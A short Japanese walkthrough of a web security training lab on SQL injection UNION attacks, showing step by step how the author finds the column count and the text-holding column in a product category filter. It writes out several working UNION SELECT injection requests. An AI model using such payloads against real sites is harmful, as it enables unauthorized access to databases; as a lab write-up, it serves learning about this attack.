Hello there, ('ω')ノ
SQLインジェクションUNION攻撃でテキストを含む列の検索を。
前回に続き、今回はデータ型の模索を。
Petsカテゴリを選択して。

インターセプトして、リピータへ。

まずは、データのカラム数の確認から。
GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL--

一つ目のカラムを文字列の置き換えてSendすると。
GET /filter?category=Pets'+UNION+SELECT+'abc',NULL,NULL--

次に二つ目のカラムを文字列の置き換えてSendすると成功のレスポンスが。
GET /filter?category=Pets'+UNION+SELECT+NULL,'abc',NULL--

インターセプトをオフにして確認して、表示された文字列を。

置き換えてSendすると。
GET /filter?category=Pets'+UNION+SELECT+NULL,'V0D6KE',NULL--

クリアできた。

ちなみに下記のようなリクエストをSendすると成功のレスポンスが。
これで一つ目のカラムのデータ型がわかって。
GET /filter?category=Pets'+UNION+SELECT+123,'abc',NULL--

ちなみに二つ目のカラムに指定するとエラーで。
GET /filter?category=Pets'+UNION+SELECT+NULL,123,NULL--

Best regards, (^^ゞ